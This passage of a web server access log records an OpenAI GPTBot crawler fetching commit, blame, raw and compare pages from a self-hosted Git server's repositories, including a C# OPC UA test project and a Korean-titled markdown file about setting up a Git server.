- GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 69112] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:17:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 71799] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:17:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 151600] [Gzip 15.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:17:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 142892] [Gzip 15.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:17:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.gitignore" [Client 74.7.227.38] [Length 9916] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.gitignore" -[17/Feb/2026:14:17:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/dcsintegration.png?display=rendered" [Client 74.7.227.38] [Length 10860] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/dcsintegration.png" -[17/Feb/2026:14:17:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 558433] [Gzip 13.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main" -[17/Feb/2026:14:17:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 558058] [Gzip 13.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main" -[17/Feb/2026:14:17:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/global.json" [Client 74.7.227.38] [Length 11093] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal" -[17/Feb/2026:14:17:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService" [Client 74.7.227.38] [Length 11086] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal" -[17/Feb/2026:14:17:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/OpcUaMinimal.csproj" [Client 74.7.227.38] [Length 11489] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal" -[17/Feb/2026:14:17:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj" [Client 74.7.227.38] [Length 11494] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal" -[17/Feb/2026:14:17:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/Program.cs" [Client 74.7.227.38] [Length 13921] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal" -[17/Feb/2026:14:17:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal" [Client 74.7.227.38] [Length 9858] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal" -[17/Feb/2026:14:17:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 137900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:17:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 71821] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:17:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 137890] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:17:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 132464] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 626287] [Gzip 15.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main?show-outdated=&style=split&whitespace=show-all" -[17/Feb/2026:14:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/global.json" [Client 74.7.227.38] [Length 10127] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/global.json" -[17/Feb/2026:14:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties" [Client 74.7.227.38] [Length 10124] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService" -[17/Feb/2026:14:17:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService" [Client 74.7.227.38] [Length 9874] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService" -[17/Feb/2026:14:17:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj" [Client 74.7.227.38] [Length 9864] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj" -[17/Feb/2026:14:17:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/OpcUaMinimal.csproj" [Client 74.7.227.38] [Length 9881] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/OpcUaMinimal.csproj" -[17/Feb/2026:14:17:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/OpcUaMinimal.csproj" [Client 74.7.227.38] [Length 362] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/OpcUaMinimal.csproj" -[17/Feb/2026:14:17:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/OpcUaMinimal.csproj" [Client 74.7.227.38] [Length 10728] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/OpcUaMinimal.csproj" -[17/Feb/2026:14:17:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/TestService.csproj" [Client 74.7.227.38] [Length 11526] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService" -[17/Feb/2026:14:17:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/Program.cs" [Client 74.7.227.38] [Length 13259] [Gzip 6.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/Program.cs" -[17/Feb/2026:14:17:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj" [Client 74.7.227.38] [Length 11221] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService" -[17/Feb/2026:14:17:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/Program.cs" [Client 74.7.227.38] [Length 2209] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/Program.cs" -[17/Feb/2026:14:17:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Worker.cs" [Client 74.7.227.38] [Length 11912] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService" -[17/Feb/2026:14:17:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties" [Client 74.7.227.38] [Length 9898] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties" -[17/Feb/2026:14:17:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Program.cs" [Client 74.7.227.38] [Length 11322] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService" -[17/Feb/2026:14:17:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.Development.json" [Client 74.7.227.38] [Length 11252] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService" -[17/Feb/2026:14:17:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.json" [Client 74.7.227.38] [Length 11243] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService" -[17/Feb/2026:14:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/Program.cs" [Client 74.7.227.38] [Length 9871] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/Program.cs" -[17/Feb/2026:14:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties/launchSettings.json" [Client 74.7.227.38] [Length 11447] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties" -[17/Feb/2026:14:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/TestService.csproj" [Client 74.7.227.38] [Length 9902] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/TestService.csproj" -[17/Feb/2026:14:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/TestService.csproj" [Client 74.7.227.38] [Length 10644] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/TestService.csproj" -[17/Feb/2026:14:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj" [Client 74.7.227.38] [Length 9880] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj" -[17/Feb/2026:14:17:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/TestService.csproj" [Client 74.7.227.38] [Length 413] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/TestService.csproj" -[17/Feb/2026:14:17:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Worker.cs" [Client 74.7.227.38] [Length 11161] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Worker.cs" -[17/Feb/2026:14:17:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Worker.cs" [Client 74.7.227.38] [Length 588] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Worker.cs" -[17/Feb/2026:14:17:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Program.cs" [Client 74.7.227.38] [Length 157] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Program.cs" -[17/Feb/2026:14:17:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.Development.json" [Client 74.7.227.38] [Length 9907] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.Development.json" -[17/Feb/2026:14:17:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.json" [Client 74.7.227.38] [Length 10327] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 